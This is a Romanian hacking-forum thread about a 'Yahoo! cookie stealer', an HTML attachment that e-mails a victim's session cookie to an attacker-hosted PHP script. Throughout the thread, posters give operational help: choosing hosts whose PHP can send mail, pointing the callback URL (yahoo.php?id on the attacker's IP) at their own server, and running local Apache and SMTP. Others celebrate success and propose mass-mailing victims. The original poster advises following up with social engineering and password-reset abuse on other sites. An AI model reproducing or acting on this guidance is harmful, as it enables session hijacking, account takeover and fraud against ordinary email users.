Yahoo! cookie stoler

[Guest Nemessis]

http://www.antifrauda.evonet.ro/ycookie.txt

Un script care odata trimis in inboxul cuiva trimite cookie-ul victimei in mailul vostru. Sesiunea ramane deschisa doar 24 ore de la citirea mesajului.

Functioneaza numai pe Internet Explorer si nu are nici un efect pe versiunea Beta a Yahoo! mail.

Pentru mai multe detalii urmariti clipul de la rubrica "Tutoriale video".

[Bigojey]

wow thank you very much m8...

nice work

[Sad_Dreamer]

ma chinui de ceva timp si nu reusesc...intra ala pe pagina..mail nu vine si am editat ala ...

[Guest Nemessis]

Asigura-te ca php-ul este pus pe un server ce ii permite aceasta functie de mailer. Sunt cazuri cand iti vine cookie si cu intarziere de 1 ora (in functie de cat de bun este serverul pe care este urcat php-ul). Deasemenea asigura-te ca victima foloseste Internet Explorer altfel nu va functiona. Pune in linkul din script adresa catre php si verifica prima oara pe tine daca merge sau nu. Daca nu merge trebuie sa uploadezi php-ul pe alt hosting. Majoritatea mailurilor cu cookies se duc in bulk datorita hostingului ce este in "black list". Evitati lx.ro, evonet.ro, xhost.ro, as.ro pentru ca aceste hosting-uri nu permit php-ului sa isi faca treaba.

[Sad_Dreamer]

pe as.ro pusesem...zi si tu un host bun te rog...

[Guest Nemessis]

That's your business from now.

[mario23]

ma frate dar nu functioneaza, mie imi arata atasamentu ca fisier text in mailu primit. Unde e buba ?? Sau deja este patchuit si asta ))

[nos]

frate mergea dar numai merge acum iti apare codu ala dn html pisamas pe astia de la yahoo imediat se prind.....

[Guest Nemessis]

Fisierul trebuie sa fie htm sau html

[Sad_Dreamer]

asa e fisierul si tot apare

[Guest Nemessis]

Doamne. Merge. NU TRIMITETI PHP. TRIMITETI DOAR SCRIPTUL PENTRU FURAT COOKIE CARE TREBUIE SA AIBA EXTENSIE HTM SAU HTML. PHP E SEPARAT SI SE URCA PE UN DOMENIU CE PERMITE SA TRIMITA MAIL CU COOKIE-URILE FURATE. Cine se va descurca bravo lui, cine nu... somn usor

[mario23]

asa am pus frate dar din mail de la yahoo nu merge am incercat si .html si .htm si imi afiseaza ca text, dar am trimis cu AMS direct html si a mers brici deci scriptu este bun ,l-am testat si merge si din bulk.

[Sad_Dreamer]

nu am mai reusit..oricum asta e ..

[SpLo1T]

frumos !

[Elias]

verry nice Nemessis

[PsYKid]

now trying ..revin cu later edit!

LATER EDIT: Haileeeeeeeeei rupeeeee p&&&zda ..merge ..merge MERGEEEEEEEEEEEEEEEEEE !! ..

// begin sfat.txt

Baieti nu va mai deschideti mailurile ...

//end sfat.txt

[nos]

se poate cumva sa-i schimbam parola victimei??

[PsYKid]

<div class='quotetop'>QUOTE("nos")</div>

se poate cumva sa-i schimbam parola victimei??

nu ai cum nos .

[ecstazy_kid]

Sad ! Pt ati merge trimiti pagina .php trimiti test.html ! pagina .php modifici mailurile tale cu cele care sunt acolo ! apoi o urci pe un web server ! Cel mai bine pune-o la tine in pc iatzi apache , e mai bine asea ! Apoi intri cu edit in pagina.html ! Si modifici acolo adresa http://xxx.xxx.xxx.xxx/yahoo.php?id ! Modifica xxx.xxx.xxx.xxx cu ip-ul tau apoi save & exit ! trimiti victimei ...deaci in colo sti !

p.S: Ca sa iti mearga iati SMTP pt ati binda la ip portu necesar 25

[Sad_Dreamer]

da ma reusisem pan' la urma mersi oricum dar e nasol ca nu poti afla passu'

[nos]

baietii eu zic sa tirmitem la toata lista....in afara de hackerii de aici...

[mihnutzu]

Merge perfect... desi degeaba daca nu iti da parola

[Guest Nemessis]

Parola se afla foarte usor dupa aceea folosind social engineering. Deasemenea verificati daca are cont pe HI5 sau orice alt serviciu web ce are optiunea de "forgot password". Foarte multi au aceeasi parola si la mail si la restul aplicatiilor online.

[SpLo1T]

nemessis pune ma si u aici script`u direct configurat de tine ! ca eu nu stiu sa`l configurez !!!

[ghici]

lol BoRy .. ce sa configurezi la el? ) :@